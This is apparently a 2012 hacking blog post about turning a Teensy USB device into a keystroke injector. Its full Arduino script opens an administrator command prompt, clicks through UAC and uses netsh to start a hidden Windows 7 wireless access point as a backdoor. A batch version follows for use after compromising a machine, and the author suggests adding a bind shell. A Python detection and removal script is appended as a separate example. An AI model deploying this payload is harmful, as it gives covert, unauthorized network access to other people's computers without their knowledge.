Thursday, March 22, 2012

Arduino Win7 wireless backdoor.

I picked up a Teensy a while back. If you don't have one and you like either causing trouble or penetration testing I HIGHLY recommend you pick one up.

Anyways, I learned about an interesting feature in Windows 7 that (if your wireless card supports it) allows you to create a software AP. So then you can connect to that and share your internet connection... or set it up without a user's knowledge, install a bind shell, and have a very hard to find wireless backdoor.

Now there are a few things that I really like about this.
1) The computer it's set up on doesn't pick up the new wireless network. So while their computer is now broadcasting a new network, when they scan for available wireless networks, they don't see it.
2) There are no notifications to the user.
3) You can script it.
4) It'll drive some poor admin NUTS trying to find the physical access point some stupid end user plugged in somewhere.

So I set about making my Teensy emulate a keyboard and type out all the commands I wanted, then dump a bind shell and activate it.

Here's the code to start cmd.exe as administrator (this assumes UAC is enabled, since the Alt+Y keystroke is what answers the consent prompt), and enter the commands to enable a new soft AP with SSID Blakhal0 and WPA passphrase Iamsupercool.

void setup() { }

void loop() {
  delay(10000);                       // wait 10 s before typing anything
  // Tap the Windows key to open the Start menu
  Keyboard.set_modifier(MODIFIERKEY_GUI);
  Keyboard.send_now();
  delay(100);
  Keyboard.set_modifier(0);
  Keyboard.send_now();
  delay(500);
  Keyboard.print("cmd");              // type into the Start menu search box
  delay(500);
  // Ctrl+Shift+Enter launches the highlighted result as administrator
  Keyboard.set_modifier(MODIFIERKEY_CTRL | MODIFIERKEY_SHIFT);
  Keyboard.send_now();
  Keyboard.set_key1(KEY_ENTER);
  Keyboard.send_now();
  delay(100);
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();
  delay(1000);
  // Alt+Y answers "Yes" on the UAC prompt
  Keyboard.set_modifier(MODIFIERKEY_ALT);
  Keyboard.send_now();
  Keyboard.set_key1(KEY_Y);
  Keyboard.send_now();
  delay(100);
  Keyboard.set_modifier(0);
  Keyboard.set_key1(0);
  Keyboard.send_now();
  delay(1000);
  // Configure the hosted network (SSID and WPA key)
  Keyboard.print("netsh wlan set hostednetwork mode=allow ssid=Blakhal0 key=Iamsupercool");
  Keyboard.set_key1(KEY_ENTER);
  Keyboard.send_now();
  delay(100);
  Keyboard.set_key1(0);
  Keyboard.send_now();
  delay(1000);
  // Start broadcasting it
  Keyboard.print("netsh wlan start hostednetwork");
  Keyboard.set_key1(KEY_ENTER);
  Keyboard.send_now();
  delay(100);
  Keyboard.set_key1(0);
  Keyboard.send_now();
  delay(1000);
  // Close the prompt
  Keyboard.print("exit");
  Keyboard.set_key1(KEY_ENTER);
  Keyboard.send_now();
  delay(100);
  Keyboard.set_key1(0);
  Keyboard.send_now();
  delay(999999);                      // idle so loop() doesn't retype everything
}

There are a lot of other people who are way better at writing compact code for the Arduino than I am. I THINK over at Iron Geek's website there are some space-saving functions that you can mangle into your code to cut down the bloat.
www.irongeek.com

You can figure out dropping the bind shell on your own, you lazy mooches.
Having it drop the bind shell is left as an exercise to the reader.

I did send this to Dave Kennedy (ReL1K) www.secmaniac.com to integrate into SET as an arduino payload but I've yet to see it as an option. Or maybe I just didn't see it in the change log, I mean it's not like he releases 15,000 revisions (a day) when he gets on a roll. And I haven't had the occasion to need to use SET in a while.

So for those playing at home, the batch equivalent of this is pretty easy to figure out since, well, it's right in there. Of course you're missing the run-as-administrator part, but if you happen to pop a shell on a Windows 7 box with wireless you can give this a try, or if you're psexec'd in. Again, it'll only work if the wireless card supports it and you have to be administrator or better. Most of the wireless cards I've tested it with worked out of the box or just needed a firmware update. I haven't found any (out of the 5 I've tested) that flat out wouldn't work.

-=The Script=-

@echo off
netsh wlan set hostednetwork mode=allow ssid=Blakhal0 key=Iamsupercool
netsh wlan start hostednetwork
exit
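As an added example (not from the original post), here is the defender-side counterpart to the script above: it parses the output of netsh wlan show hostednetwork, flags a hosted network that is allowed or started, and issues the two netsh commands that stop it and set the mode back to disallow. The sample output is constructed, and the field names it parses are assumed from netsh's usual layout.

```python
import re
import subprocess

# Constructed sample of `netsh wlan show hostednetwork` output from a host
# where the post's two netsh commands have been run and one client joined.
SAMPLE_OUTPUT = """\
Hosted network settings
-----------------------
    Mode                   : Allowed
    SSID name              : "Blakhal0"

Hosted network status
---------------------
    Status                 : Started
    Number of clients      : 1
        aa:bb:cc:dd:ee:ff        Authenticated
"""

# Field lines look like "    Mode                   : Allowed" (assumed layout)
_FIELD = re.compile(r"^\s*(Mode|SSID name|Status|Number of clients)\s*:\s*(.*?)\s*$", re.M)

def parse_hostednetwork(text):
    """Pull mode, SSID, status and client count out of the netsh output."""
    fields = dict(_FIELD.findall(text))
    return {
        "mode": fields.get("Mode", ""),
        "ssid": fields.get("SSID name", "").strip('"'),
        "status": fields.get("Status", ""),
        "clients": int(fields.get("Number of clients") or 0),
    }

def is_suspicious(info):
    """A hosted network that is allowed or started on a workstation with no
    reason to share its connection is exactly what the post's script leaves."""
    return info["mode"].lower() == "allowed" or info["status"].lower() == "started"

def disable_hostednetwork(run=subprocess.run):
    """Undo the post's sequence: stop the AP, then disallow the mode so a later
    `netsh wlan start hostednetwork` fails. Needs an elevated prompt on Windows;
    `run` is injectable so the logic can be exercised off-box."""
    cmds = [["netsh", "wlan", "stop", "hostednetwork"],
            ["netsh", "wlan", "set", "hostednetwork", "mode=disallow"]]
    for cmd in cmds:
        run(cmd, check=False)
    return cmds

if __name__ == "__main__":
    info = parse_hostednetwork(SAMPLE_OUTPUT)
    print(info, "-> hosted network present" if is_suspicious(info) else "-> clean")
```

On a real host, feed it the live output of netsh wlan show hostednetwork and call disable_hostednetwork() from an elevated prompt; mode=disallow is also the setting to push via a startup script on workstations that should never act as an AP.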
